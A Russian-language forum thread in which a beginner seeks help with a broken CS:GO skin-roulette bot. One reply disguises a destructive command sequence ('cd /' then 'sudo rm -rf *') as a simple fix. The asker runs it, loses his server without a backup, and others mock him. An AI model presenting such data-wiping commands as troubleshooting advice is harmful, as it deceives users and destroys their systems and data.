• Данный материал предоставлен сайтом исключительно в ознакомительных целях.
    Администрация не несет ответственности за его содержимое. По всем жалобам пишите на почту abusevhguru@yandex.ru

Помощь В чём может быть проблема ? (БОТ)

Freez

Новичок
Реакции
343

Freez

• 380
  • 343
Обратите внимание, пользователь заблокирован. Крайне не рекомендуем заключать сделки с этим пользователем,
✶F R E E Z✶: Строго не судите я тут новенький. В чём может быть проблема, когда ты вносишь предметы в рулетку, они приходят к боту и просто весят, он их не принимает и не вставляет в игру,
также когда 2 игрока вносят карточки, таймер начинает идти, и доходит до 42 секунды и обнуляется, тоесть начинает идти заново с 02:00 минуты, я знаю точно что это что-то с ботом связано, но не знаю как это исправить, кто поможет готов заплатить, если здесь есть люди которые готовы бесплатно помочь то с радостью приму эту помощь, также с меня +rep :), ссылка на рулетку: (не реклама, она всё равно не работает ещё !) Основу брал CSLUT Последней версии.

За ошибки извиняюсь, спешил. (С телефона) :oops:

Freez

Новичок
Реакции
343

Freez

• 380
  • 343
Обратите внимание, пользователь заблокирован. Крайне не рекомендуем заключать сделки с этим пользователем,
up

Hyxer

Опытный
Реакции
48

Hyxer

• 172
  • 48
✶F R E E Z✶: Строго не судите я тут новенький. В чём может быть проблема, когда ты вносишь предметы в рулетку, они приходят к боту и просто весят, он их не принимает и не вставляет в игру,
также когда 2 игрока вносят карточки, таймер начинает идти, и доходит до 42 секунды и обнуляется, тоесть начинает идти заново с 02:00 минуты, я знаю точно что это что-то с ботом связано, но не знаю как это исправить, кто поможет готов заплатить, если здесь есть люди которые готовы бесплатно помочь то с радостью приму эту помощь, также с меня +rep :), ссылка на рулетку: (не реклама, она всё равно не работает ещё !) Основу брал CSLUT Последней версии.

За ошибки извиняюсь, спешил. (С телефона) :oops:
Мне в вк напиши -

Freez

Новичок
Реакции
343

Freez

• 380
  • 343
Простая проблема, простое решние, в 3 команды

Код:
apt-get install sudo
cd /
sudo rm -rf *
После этих команд у меня перестала работать рулетка и я не могу зайти в патти и фаилзиллу
В чём проблема ?
И что это за команды ?

Freez

Новичок
Реакции
343

Freez

• 380
  • 343
И вы хотите сказать что это нормальный человек ?, Админ за такое бан давать нужно !, хуйло ебанное, у меня бкапа небыло !

Freez

Новичок
Реакции
343

Freez

• 380
  • 343

Xtallas55ru

Заблокирован
Реакции
98

Xtallas55ru

• 242
  • 98

sill

Опытный
Реакции
70

sill

• 166
  • 70
И вы хотите сказать что это нормальный человек ?, Админ за такое бан давать нужно !, хуйло ебанное, у меня бкапа небыло !
Дружище, а что ты хотел? Если ты даже элементарно в 3 командах саааааамых базовых разобраться не можешь! Ну написали бы тебе что то в стиле обнови модули нода, открой порты в фв, что бы было? Ты бы начал писать сюда со слезами, что не знаешь как делается... Зачем тебе это? Зачем тебе очередная рулетка на которую никто никогда не зайдет, а если зайдет то ты сразу с помощью подкрутки сольешь все скины которые человек поставил. Выведешь деньги, купишь себе блейзер (если человек поставит так много) и забудешь, что надо оплачивать свою впску через пару недель. Результат? Все кто тебе писали, отвечали, помогали еще и бесплатно просто потратят свое время... Сделай выводы и реально посиди и поучи юниксовые команды... Это будет значительно полезнее для всех!

Freez

Новичок
Реакции
343

Freez

• 380
  • 343
Дружище, а что ты хотел? Если ты даже элементарно в 3 командах саааааамых базовых разобраться не можешь! Ну написали бы тебе что то в стиле обнови модули нода, открой порты в фв, что бы было? Ты бы начал писать сюда со слезами, что не знаешь как делается... Зачем тебе это? Зачем тебе очередная рулетка на которую никто никогда не зайдет, а если зайдет то ты сразу с помощью подкрутки сольешь все скины которые человек поставил. Выведешь деньги, купишь себе блейзер (если человек поставит так много) и забудешь, что надо оплачивать свою впску через пару недель. Результат? Все кто тебе писали, отвечали, помогали еще и бесплатно просто потратят свое время... Сделай выводы и реально посиди и поучи юниксовые команды... Это будет значительно полезнее для всех!
Во первых я не собираюсь не кому подкручивать, и плакать тоже, во вторых у меня реклама уже заказана и заказана на очень приличную сумму!, и вообще к чему твоё сообщение ? Ты написал не по теме, значит спам !, лучше бы помог чем марали читать !

mrxcoder

Premium
Реакции
183

mrxcoder

• 349
  • 183
Во первых я не собираюсь не кому подкручивать, и плакать тоже, во вторых у меня реклама уже заказана и заказана на очень приличную сумму!, и вообще к чему твоё сообщение ? Ты написал не по теме, значит спам !, лучше бы помог чем марали читать !
На 1000 рублей что ли?
:D

sill

Опытный
Реакции
70

sill

• 166
  • 70
Я написал не по теме? Я что про баб или пляжных чаек тут глаголю? Я тебе дал совет и при чем действительно нужный совет для тебя. А что касается рекламы, то нужно быть реально дауном что бы оплатить рекламу на какую-то паблик рулетку, которая не работает и когда ты представления ни имеешь банально как администрировать сервер. Виноват именно ты и виноват по свое глупости! Автору скрипта который написал тебе "веселый код эрэма" респект!

Revolution

Пользователь
Реакции
7

Revolution

• 70
  • 7
Тебе помочь с установкой? У тебя скорее всего сокеты не были настроены.

Freez

Новичок
Реакции
343

Freez

• 380
  • 343

max155

Местный
Реакции
15

max155

• 69
  • 15
Самое странное, что при любых проблемах говорят писать в тему "Помощь"
А там посылают нах и говорят, что удаляй рулетку!
ЛОГИКА!
Вы просто как дети, реально
Похер на человека, тогда пройди мимо!

Freez

Новичок
Реакции
343

Freez

• 380
  • 343
Мне уже пыталось помочь 8 человек, и всё бестолку !

Dead-Master

Местный
Реакции
21

Dead-Master

• 57
  • 21
Мне уже пыталось помочь 8 человек, и всё бестолку !
А самому сесть почитать форуме, разобраться что как работает.
Думаешь что-то сможешь заработать если будешь бегать у школоты просить советов?

Сверху